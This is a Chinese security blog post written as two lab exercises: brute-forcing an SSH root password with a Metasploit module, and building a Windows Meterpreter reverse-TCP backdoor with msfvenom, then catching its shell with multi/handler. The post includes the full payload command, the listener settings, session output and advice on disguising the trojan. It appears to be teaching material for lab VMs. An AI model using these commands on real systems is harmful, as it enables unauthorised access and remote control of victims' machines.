<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="漏洞复现,">










<meta name="description" content="MSF实验利用msf爆破ssh服务密码">
<meta name="keywords" content="漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="MSF实验">
<meta property="og:url" content="blog.shenzihao.top/2019/08/10/MSF实验/index.html">
<meta property="og:site_name" content="changyouB-log">
<meta property="og:description" content="MSF实验利用msf爆破ssh服务密码">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-08-11T05:59:23.487Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="MSF实验">
<meta name="twitter:description" content="MSF实验利用msf爆破ssh服务密码">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="blog.shenzihao.top/2019/08/10/MSF实验/">





  <title>MSF实验 | changyouB-log</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">changyouB-log</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">网络安全</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="blog.shenzihao.top/2019/08/10/MSF实验/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="申子昊">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/1.jpg">
    </span>

     <span title="Words count in article">
     1.9k 字
     </span>

        ...
     <span title="Reading time">
     7 分钟
     </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="changyouB-log">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">MSF实验</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-10T11:39:25+08:00">
                2019-08-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.9k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time </span>
                
                <span title="Reading time">
                  7
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="MSF实验"><a href="#MSF实验" class="headerlink" title="MSF实验"></a>MSF实验</h1><h2 id="利用msf爆破ssh服务密码"><a href="#利用msf爆破ssh服务密码" class="headerlink" title="利用msf爆破ssh服务密码"></a>利用msf爆破ssh服务密码</h2><a id="more"></a>

<p>一、    实验目的</p>
<ol>
<li>了解SSH的概念</li>
<li>理解MSF爆破SSH的工作原理</li>
<li>掌握MSF爆破SSH服务密码的方法<br>二、    实验要求</li>
<li>根据实验指导书，完成msf爆破ssh服务密码的实验操作。</li>
<li>编制msf爆破ssh服务密码的实验报告，验证实验过程。<br>三、    实验原理<br>SSH是一种网络协议，用于计算机之间的加密登录。<br>如果一个用户从本地计算机，使用SSH协议登录另一台远程计算机，我们就可以认为，这种登录是安全的，即使被中途截获，密码也不会泄露。<br>最早的时候，互联网通信都是明文通信，一旦被截获，内容就暴露无疑。1995年，芬兰学者Tatu Ylonen设计了SSH协议，将登录信息全部加密，成为互联网安全的一个基本解决方案，迅速在全世界获得推广，目前已经成为Linux系统的标准配置。<br>需要指出的是，SSH只是一种协议，存在多种实现，既有商业实现，也有开源实现。本文针对的实现是OpenSSH，它是自由软件，应用非常广泛。<br>通过kali中的msf对我们具有ssh服务的服务器进行账号密码的爆破，从而让我们可以远程登录这台具有ssh服务的服务器</li>
</ol>
<p>四、    实验环境<br>Kali linux, centos<br>用户名：root<br>密码：sahoo@123<br>五、    实验操作<br>步骤一：    先打开msf</p>
<p>步骤二：<br>作为我们的攻击机，我们利用msf这款工具来对ssh协议服务的账号密码进行爆破，输入msfconsole命令以开启msf这款工具</p>
<p>步骤三：    然后我们用search ssh命令来查找相应的对ssh服务的一些攻击模块，其中划红箭头的是我们所需要的利用模块</p>
<p>步骤四：    然后我们直接use这个模块，对这个模块的相关参数进行设置</p>
<p>步骤五：    然后我们show options查看相应的参数设置，其中划红线的就是我们所需要设置的一些模块，RHOSTS是目标主机的ip，RPORT是目标主机开放ssh服务的相应端口，PASS_FILE是我们所需要的爆破密码的字典，USER_FILE使我们所需要的爆破用户名的字典，THREADS是我们爆破的线程，也可以理解为速度的快慢</p>
<p>设置我们的目标主机的ip是192.168.78.129</p>
<p>设置我们的目标主机开放ssh服务的端口 </p>
<p>设置我们的线程为最大值5，这也是msf默认允许的最大的线程值</p>
<p>步骤六：    字典的话我们可以自己用kali自带的crunch工具来生成，生成一个名为a.txt文件中，那么a.txt文件就是一个我们的字典，但是由于线程数非常的小，而且我们这次主要是以实验为主要目的，于是我们可以用网上一些较小的字典，来节省爆破的时间<br> 设置我们的密码的字典为桌面的pass.txt</p>
<p>设置我们的用户名的字典为桌面的user.txt</p>
<p>步骤七：    然后我们再次show options查看相应的设置是否完成</p>
<p>步骤八：    设置完成后我们就直接exploit进行爆破，然后等待结果即可</p>
<p>步骤九：    当爆破成功一个后，就会如此提示我们，并且提示我们已经成功的与目标主机建立了一个会话</p>
<p>步骤十：    然后我们输入sessions 来查看这次会话的信息</p>
<p>步骤十一：    然后我们用爆破出来的密码来进行ssh登录目标主机，可以看到我们进入了root用户的终端shell界面，当然我们也可以在我们刚才的msf中输入sessions -i 1来进入meterpreter界面从而输入shell来进入同样的终端界面，这两种方式都是可以的</p>
<p>六、    实验结论<br>请按要求完成实验报告，并按时提交给老师。<br>实验效果验证</p>
<p>七、    课后拓展<br>1.两种shell登录方式都试一下</p>
<p>八、    先序课程</p>
<ol>
<li><p>《密码攻击-字典的生成》</p>
<hr>
<h2 id="metasploit之后门的生成"><a href="#metasploit之后门的生成" class="headerlink" title="metasploit之后门的生成"></a>metasploit之后门的生成</h2><p>后门简介<br>后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。<br>metasploit可以生成多种多样的后门，比如windows、linux、java、php等。</p>
<p>KALI ip 192.168.10.128<br>WIN7 ip 10.0.2.2 </p>
<p>选择以下攻击载荷并生成一个exe的木马程序</p>
<p>命令msfconsole 开启Metasploit</p>
<p>查看payload，使用命令show payloads，msf提供了多种攻击载荷<br>选择以下攻击载荷（使用TAB键自动补全），并生成一个exe的木马程序<br>msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=4444 -f exe -o /123.exe<br>其中，lhost为kali linx的IP地址 生成的exe文件存放在根目录下</p>
</li>
</ol>
<p>   使用命令 cd /，可以看到我们生成的exe文件</p>
<hr>
<p>   接下来，我们需要把生成的exe文件伪装成其他文件发送到目标机上。由于实验机环境限制，为了把我们生成的exe上传到目标机上，这里我们需要使用Putty这个工具，将生成的exe文件传到win7虚拟机上。</p>
<hr>
<p>   为了不出现连接被拒绝的情况，我们首先要在kali linux上打开ssh服务，并且关闭win7防火墙。<br>   在kali linux上打开ssh服务的方法：<br>   apt-get install openssh-server#安装<br>   一、配置SSH参数<br>   修改sshd_config文件，命令为：<br>   vi /etc/ssh/sshd_config<br>   将#PasswordAuthentication no的注释去掉，并且将NO修改为YES，kali中默认是yes<br>   右击桌面，单击打开终端，输入命令<br>   将PermitRootLogin without-password修改为<br>   PermitRootLogin yes<br>   二、启动SSH服务<br>   命令为：<br>   /etc/init.d/ssh start<br>   或者<br>   service ssh start<br>   查看SSH服务状态是否正常运行，命令为<br>   /etc/init.d/ssh status<br>   或者service ssh status<br>   那么需要生成两个密钥：<br>   ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key<br>   ssh-keygen -t dsa -f /etc/ssh/ssh_host_rsa_key</p>
<p>   执行命令后都会让输入密码，直接敲回车设置为空即可</p>
<p>   Win7关闭防火墙的方法</p>
<hr>
<p>   接着打开win7上win+R输入psftp.exe，使用命令 open192.168.10.128  ，连接到kali linux，使用cd /跳转到根目录下，使用命令get 文件名把文件下载到本地。</p>
<hr>
<hr>
<p>   在msf中设置监听<br>   use exploit/multi/handler </p>
<p>   show options </p>
<p>   设置我们后门生成时的攻击载荷<br>   set payload windows/meterpreter/reverse_tcp<br>   show options<br>   set payload windows/meterpreter/reverse_tcp</p>
<p>   payload =&gt; windows/meterpreter/reverse_tcp</p>
<p>   设置参数（与后门的参数相对应）<br>   msf exploit(multi/handler) &gt; set LHOST 192.168.10.128<br>   LHOST =&gt; 192.168.10.128<br>   msf exploit(multi/handler) &gt; set LPORT 4444<br>   LPORT =&gt; 4444</p>
<p>   msf exploit(multi/handler) &gt; run</p>
<p>   在windows主机上点击123.exe。当被攻击者运行了我们上传的后门程<br>   序时，会弹回一个shell<br>   [<em>] Started reverse TCP handler on 192.168.10.128:4444<br>   [</em>] Sending stage (179779 bytes) to 192.168.10.1<br>   [<em>] Sleeping before handling stage…<br>   [</em>] Meterpreter session 1 opened (192.168.10.128:4444 -&gt; 192.168.10.1:53292) at 2019-07-28 14:08:08 +0800</p>
<p>   实验结束</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/漏洞复现/" rel="tag"># 漏洞复现</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/10/权限维持实验/" rel="next" title="权限维持实验">
                <i class="fa fa-chevron-left"></i> 权限维持实验
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/10/xss实战/" rel="prev" title="xss实战">
                xss实战 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/1.jpg" alt="申子昊">
            
              <p class="site-author-name" itemprop="name">申子昊</p>
              <p class="site-description motion-element" itemprop="description">多一份网络防护技能,多一份信息安全保证</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/Flash1201" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:shenzihao76@gmail.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://tcp123.cn" target="_blank" title="友情链接">
                      
                        <i class="fa fa-fw fa-globe"></i>友情链接</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://ibbs.tcp123.cn/index.php?c=thread&fid=25" target="_blank" title="论坛连接">
                      
                        <i class="fa fa-fw fa-globe"></i>论坛连接</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#MSF实验"><span class="nav-number">1.</span> <span class="nav-text">MSF实验</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#利用msf爆破ssh服务密码"><span class="nav-number">1.1.</span> <span class="nav-text">利用msf爆破ssh服务密码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#metasploit之后门的生成"><span class="nav-number">1.2.</span> <span class="nav-text">metasploit之后门的生成</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">申子昊</span>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">91.8k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>










        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人
    </span>
  

  
    <span class="site-pv">
      总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
